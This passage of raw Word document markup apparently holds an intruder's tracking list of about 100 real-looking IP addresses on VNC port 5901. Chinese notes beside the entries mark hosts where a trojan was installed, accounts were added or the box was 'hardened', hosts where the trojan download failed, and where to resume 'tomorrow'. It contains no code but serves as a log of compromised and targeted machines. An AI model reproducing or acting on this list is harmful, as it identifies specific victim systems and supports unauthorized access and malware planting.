          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.248.0.13:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.248.0.11: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36.248.0.8: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36.248.1.7:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.2:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.7:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">36.250.90.4:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.5:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.8:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.3:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">36.250.90.6:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">42.51.3.67:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>58.16.50.148:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法下载木马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>58.16.50.150:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法下载木马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>58.16.50.149:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法下载木马真的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>58.83.169.196:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法下载木马真的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>58.83.169.199:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法下载木马真的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>58.83.174.182:5901</w:t>
      </w:r>
      <w:r w:rsidRPr="00886B4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已搞定</w:t>
      </w:r>
      <w:r w:rsidRPr="00886B4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00886B4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已上马</w:t>
      </w:r>
      <w:r w:rsidRPr="00886B4F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">58.240.63.112:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法下载木马真的</w:t>
      </w:r>
      <w:r w:rsidRPr="00144FF9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>///////////////</w:t>
      </w:r>
      <w:r w:rsidRPr="00144FF9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>明天从这开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.172.251.195:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.2:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>////////////////////////////////110 no</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.6:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.15:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.9:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.20:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.29:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.38:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.43:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">110.249.208.45:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.48:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.57:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.63:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.74:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.78:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.23:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.21:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.87:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.88:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.37:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.1:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.90:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.97:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.49:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.35:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.55:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.117:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.44:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">110.249.208.56:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.66:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.60:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.95:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.80:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.91: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110.249.208.82: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110.249.208.111:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.86:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">centos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已加用户</w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>上马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.98:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法安装</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.102:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">centos </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已搞定已上马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.121:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法下载木马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.249.208.148:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.121.7.100:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">centos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已加账户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法下载木马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.121.7.99:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">centos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已加账户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法下载木马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.121.7.101:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.18.79.12:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.194.50.89:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.194.50.107:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.194.229.10:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>119.253.8.38:5901</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC70BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">centos </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已搞定已上马</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已加固</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.22.33.30:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">123.7.17.200:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法下载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.32.114.89:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.45.149.155:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.45.158.7:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.102.86.61:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.108.15.174:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">202.108.15.223:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>木马有问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本系统不兼容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>段错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.14.133.3:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.51.165.40:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">centos </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已搞定已上马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.51.165.41:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">centos </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已搞定已上马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.152.61.91:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">centos </w:t>
      </w:r>
      <w:r w:rsidRPr="009315ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已搞定已上马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.156.177.8:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.156.177.125:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.28.153.37:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.127.140:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>219.136.240.42:5901</w:t>
      </w:r>
      <w:r w:rsidRPr="0075635B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0075635B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>centos</w:t>
      </w:r>
      <w:r w:rsidRPr="0075635B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已搞定</w:t>
      </w:r>
      <w:r w:rsidRPr="0075635B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0075635B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已上马</w:t>
      </w:r>
    </w:p>
